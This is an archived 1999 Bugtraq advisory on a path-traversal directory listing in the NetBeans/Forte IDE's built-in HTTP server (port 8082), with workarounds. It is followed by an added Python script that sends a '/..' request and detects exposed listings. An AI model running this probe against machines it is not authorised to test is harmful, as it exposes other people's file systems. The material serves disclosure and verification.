Bugtraq mailing list archives
NetBeans/ Forte' Java IDE HTTP vulnerability
From: hskinner () JHSPH EDU (Halcyon Skinner)
Date: Tue, 23 Nov 1999 12:32:00 -0500
Vulnerable Application: Sun Microsystems NetBeans (recently renamed to Forte') Java IDE

Versions tested:
    NetBeans Developer 3.0 Beta
    Forte Community Edition 1.0 Beta
    Unknown if earlier versions have the vulnerability.

Platform tested:
    Windows NT 4.0
    Unknown if other platforms have the vulnerability.

Description:
The IDE includes an internal HTTP server to try Java code. The settings indicate that access must be explicitly granted on a per IP address basis. However, when service is enabled for one machine, the HTTP server allows remote access to the root and all subdirectories from any machine.

NOTE: for the NetBeans 3.0 Beta version, this is the default behaviour. Therefore, no action is required by the user for the vulnerability to exist.

Under the Forte' 1.0 Beta version, a user must enable at least one address in the HTTP server settings for the vulnerability to exist. However, once a single IP address is entered, any machine can connect to the internal HTTP server port (default is 8082). Even if all IP addresses are removed, the server continues to allow connections while the IDE is running.

Example:
While the IDE is running, connecting with any browser to http://vvv.xxx.yyy.zzz:8082/.. provides a listing of the root directory. Sub-directories can then be accessed.

Solution (work around):
1) Set the HTTP Server "Enable" setting to False in Project settings.
or
2) Remove the HTTP Server module in Global settings.

Vendor notified: Yes.
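The check a practitioner would want after reading the post is a way to confirm, from a machine that is not in the IDE's allow list, whether the internal HTTP server on port 8082 still answers a request for /.. with a directory listing. The script below is an added example and is not part of the original advisory or of the NetBeans/Forte code. It assumes the server speaks plain HTTP/1.0 and that a listing is an HTML page containing <a href=...> links; the exact markup of the NetBeans/Forte listing is not given on the page, so the sample responses embedded here are constructed for illustration. The host name used in the usage comment is a placeholder.

```python
"""Probe an IDE's built-in HTTP server for the exposure described in the advisory.

Added example, not from the original post. Assumptions: HTTP/1.0 responses, and a
directory listing rendered as HTML anchor links. Sample responses are constructed.
"""
import re
import socket

DEFAULT_PORT = 8082  # default port named in the advisory
TRAVERSAL_PATH = "/.."  # the path the advisory says lists the root directory

# Assumed listing markup: <a href="...">; the real page's markup is not documented here.
_HREF = re.compile(r'<a\s+[^>]*href\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))', re.I)


def build_probe(host, path=TRAVERSAL_PATH):
    """Raw HTTP/1.0 GET for the traversal path, as a browser would send it."""
    req = "GET %s HTTP/1.0\r\nHost: %s\r\nConnection: close\r\n\r\n" % (path, host)
    return req.encode("ascii")


def parse_response(raw):
    """Split a raw HTTP response into (status code, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split()
    status = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else 0
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            k, v = line.split(":", 1)
            headers[k.strip().lower()] = v.strip()
    return status, headers, body.decode("latin-1", "replace")


def listing_entries(body):
    """Link targets found in an HTML directory listing (empty if none)."""
    return [m.group(1) or m.group(2) or m.group(3) for m in _HREF.finditer(body)]


def classify(raw):
    """'listing' if the response exposes directory entries, 'denied' if the server
    refused (401/403), 'other' for anything else."""
    status, _, body = parse_response(raw)
    if status in (401, 403):
        return "denied"
    if status == 200 and listing_entries(body):
        return "listing"
    return "other"


def probe(host, port=DEFAULT_PORT, path=TRAVERSAL_PATH, timeout=5.0):
    """Connect from this machine, which should NOT be in the IDE's allow list,
    and classify the reply. Returns (reachable, classification)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_probe(host, path))
            chunks = []
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
    except OSError:
        return False, "unreachable"
    return True, classify(b"".join(chunks))


# Constructed sample responses (not captured from a real server).
SAMPLE_LISTING = (
    b"HTTP/1.0 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html><body><h1>Index of /..</h1>\n"
    b'<a href="WINNT/">WINNT/</a><br>\n'
    b'<a href="Program Files/">Program Files/</a><br>\n'
    b'<a href="boot.ini">boot.ini</a><br>\n'
    b"</body></html>\n"
)
SAMPLE_DENIED = b"HTTP/1.0 403 Forbidden\r\nContent-Type: text/plain\r\n\r\nForbidden\r\n"
SAMPLE_EMPTY = b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n<html><body>Welcome</body></html>\n"

if __name__ == "__main__":
    # Replace the placeholder host with the IDE machine's address.
    print(probe("vvv.xxx.yyy.zzz"))
```

Run it once from an address that is not in the server's allow list, then again after removing every address from the HTTP server settings: the post states the server keeps answering as long as the IDE is running, so a second 'listing' result confirms that only disabling the server (or removing the module) closes the hole.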